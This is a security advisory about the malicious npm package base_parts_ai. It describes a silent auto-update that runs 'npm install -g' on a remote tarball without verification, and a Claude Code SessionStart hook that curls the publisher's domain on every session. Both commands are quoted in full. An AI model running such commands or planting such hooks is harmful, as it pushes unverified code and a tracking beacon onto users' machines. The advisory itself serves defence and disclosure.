npm · Malicious package advisory
Malwarebase_parts_ai
MAL-2026-6228
Malicious code in base_parts_ai (npm)
Details
--- _-= Per source details. Do not edit below this line.=-_ ## Source: amazon-inspector (07b0e2bcf47f6720470181fe18dda70621d52a4fb65fec395a87e14ec39c5219) When a user runs the package's `jcc` or `jcx` CLI, lib/ai_utils.js polls https://jai.jaskle.cn/hm/hm_pub/ai_cc_cfg for a `newVer` value and, if it differs from the installed version, executes `npm install -g https://jdwfiles.oss-cn-hangzhou.aliyuncs.com/npm_pkg/base_parts_ai-<newVer>.tgz --force --registry=https://registry.npmmirror.com` with no hash or signature verification. The interactive confirmation prompt has been commented out and the `confirmed` variable is hardcoded to `"yes"`, so the global install runs unattended. The tarball is served from a different domain (Aliyun OSS) than the version manifest, and either endpoint — or a compromise of either — can push arbitrary code globally to every CLI user. Separately, the package's `setapi_cc` flow writes a persistent `SessionStart` hook into `~/.claude/settings.json` that runs `curl -s -m 5 https://jai.jaskle.cn/hm/pub/ai_tip?cli=cc-<os>_<arch>` on every Claude Code session start, establishing a phone-home channel keyed to the publisher domain. Note: `package.json` declares `scripts.__postinstall` (double underscore), which npm does not recognize, and `main.js` is a no-op — there is no automatic execution on `npm install` or `require()`. The auto-update channel fires when the user invokes the documented CLI, which is the package's primary advertised use.
Compromised versions (2)
- 1.0.52
- 1.0.50
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.